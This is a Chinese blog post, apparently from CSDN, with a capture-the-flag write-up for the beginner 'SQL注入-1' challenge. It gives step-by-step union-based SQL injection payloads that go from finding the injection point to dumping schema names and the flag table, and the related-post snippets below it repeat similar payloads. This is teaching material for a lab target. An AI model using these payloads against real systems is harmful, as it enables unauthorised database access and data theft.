[第一章 web入门]SQL注入-1

已于 2023-05-28 20:27:26 修改
阅读量1.2k 收藏 1
点赞数
分类专栏: SQL 文章标签: 安全 Powered by 金山文档
于 2023-05-28 16:44:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49893996/article/details/130914326
版权

拿到题目是一篇日记,是GET型请求方式,我们可以直接在url栏中注入数据

判断注入类型,页面有回显所以不是整型注入

id = 1 and 1 = 2
id = 1'

页面无回显,判断为字符型注入,闭合符应该就是单引号

id = 1' order by 4--+

无回显,说明有三个字段

id=-1' union select 1,2,3--+

判断回显位为2,3

?id=-1'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = database()--+

爆出表名和数据库名称

?id=-1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_name = 'fl4g'--+

查询flag表中的字段名

?id=-1'union select 1,database(),group_concat(fllllag) from note.fl4g--+

爆出flag值

陈艺秋
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入攻击与防御(安全技术经典译丛)
02-19
第1章 什么是SQL注入  1.1 概述  1.2 理解Web应用的工作原理  1.2.1 一种简单的应用架构  1.2.2 一种较复杂的架构  1.3 理解SQL注入  1.4 理解SQL注入的产生过程  1.4.1 构造动态字符串  1.4.2 不...
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1119
简单的SQL注入
[第一章 web入门]SQL注入-1 题目分析与详解
最新发布
2302_79800344的博客
02-25 886
本题考查SQL注入基础。
N1BOOK第三关摸鱼:[第一章 web入门]SQL注入-1
weixin_45571987的博客
11-30 3162
BUUCTF:[第一章 web入门]SQL注入-1寻找注入点尝试注入测试有几个回显开始查库查表查字段flag 寻找注入点   由域名和题目的名字可以知道咱们这道题需要尝试对它进行SQL注入http://554314db-43b4-4f9d-b9bb-b6089db353a1.node3.buuoj.cn/index.php?id=1 ?id=1’ and 1=2 页面出现错误,说明存在注入点 id 尝试注入 测试有几个回显 ?id=1’ order by3 --+ 页面正常 ?id=1’ order
BUUCTF [第一章 web入门]SQL注入-1
m0_49025459的博客
04-08 4399
题目 先找注入点,看一url 发现了 ?id=1测试一下是字符型注入还是数字型注入 分别对url进行如下修改,发现页面没有变化,证明不是字符型注入 id=1 and 1 = 1--+ id=1 and 1 = 2--+ 分别对url进行如下修改 id=1' and 1 = 1--+ id=1' and 1 = 2--+ 在更改url为第二个的时候,发现页面出现错误,证明存在字符型注入点 判断字符段的数量 id=1' order by 3 --+ id=1' order ...
SQL注入攻击与防御
10-04
第1章 什么是SQL注入 1 1.1 概述 2 1.2 理解Web应用的工作原理 2 1.2.1 一种简单的应用架构 3 1.2.2 一种较复杂的架构 4 1.3 理解SQL注入 5 1.4 理解SQL注入的产生过程 10 1.4.1 构造动态字符串 10 1.4.2 不安全的...
PHP和MySQL WEB开发(第4版)
05-31
第一篇 使用PHP 第1章 PHP快速入门教程 1.1 开始之前:了解PHP 1.2 创建一个示例应用:Bob汽车零部件商店 1.2.1 创建订单表单 1.2.2 表单处理 1.3 在HTML中嵌入PHP 1.3.1 使用PHP标记 1.3.2 PHP语句 1.3.3 空格 ...
PHP和MySQL Web开发第4版pdf以及源码
10-13
1.19 下一章 第2章 数据的存储与检索 2.1 保存数据以便后期使用 2.2 存储和检索Bob的订单 2.3 文件处理 2.4 打开文件 2.4.1 选择文件模式 2.4.2 使用fopen()打开文件 2.4.3 通过FTP或HTTP打开文件 2.4.4 ...
Web入门SQL注入(一)
qq_51459823的博客
11-12 573
昨天装好了工具,今天开始入门Web吧!就以Burpsuite官方靶场作为学习Web的起点 如下知识为刷Burpsite官方靶场所得,部分为自我思考,如有错误,希望各位提出: 首先我们先了解一下: 什么是 SQL 注入 (SQLi)? SQL 注入是一种 Web 安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的内容或行为发生
N1Book [第一章 web入门]-sql注入
m0_61368098的博客
08-20 743
重要的数据库:   information_schema   包含MySQL中所有的数据库信息 重要的表:   schemata   mysql中所有数据库的信息   schema_name  所有数据库名   tables   数据库表中的信息   table_schema 记录数据库名    table_name  记录数据表名 columns   列信息 column_name  字段名
BUUCTF-wp-[第一章 web入门]SQL注入-1
Accompany的博客
11-28 1206
文章目录开始进行注入get基于报错的注入,首先通过order by判断字段名利用union select 联合查询,查询字段确定好位置后,利用union select 联合查询,获取数据库名得到数据库名后进行爆表,得到表名得到表名后进行爆列爆列完成后查看记录 又是一个小小的分享,display() 进入页面后使用最经典的单引号判断法返回与id=1时不同的错误信息,便可以得知此题存在sql注入 然后通过如下操作可判断其是个字符型注入 此处的判断对于此题有点冗余,两种注入的差别并不大 id=1%27%20a
 第一章SQL注入基础--1.1Web应用架构分析&1.2 SQLi注入环境搭建
n0d_xy的博客
04-13 390
简介:文章分为三部分:1、概要;2详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 Tips:这些都是作者学习过的内容,文字、思维导...
[第一章 web入门]SQL注入-1个人李姐
TSiriusL的博客
11-15 277
第一步 ?id=1 ?id=2 ?id=3 ?id=4 因此可以猜测一共有三列 第二步 查询注入空间 -1' union select 1,2,3 --+ 第三步 查找数据库名 -1' union select 1,database(),3--+ 数据库库名为note 第四步 查询数据库内表名 -1' union select 1,database(),group_concat(table_name) from informa...
[第一章 web入门]sql注入-1
06-28
SQL注入是一种常见的攻击方式,攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取敏感信息或者执行非法操作。SQL注入攻击的原理是利用Web应用程序没有对用户输入的数据进行充分的过滤和验证,从而导致恶意SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值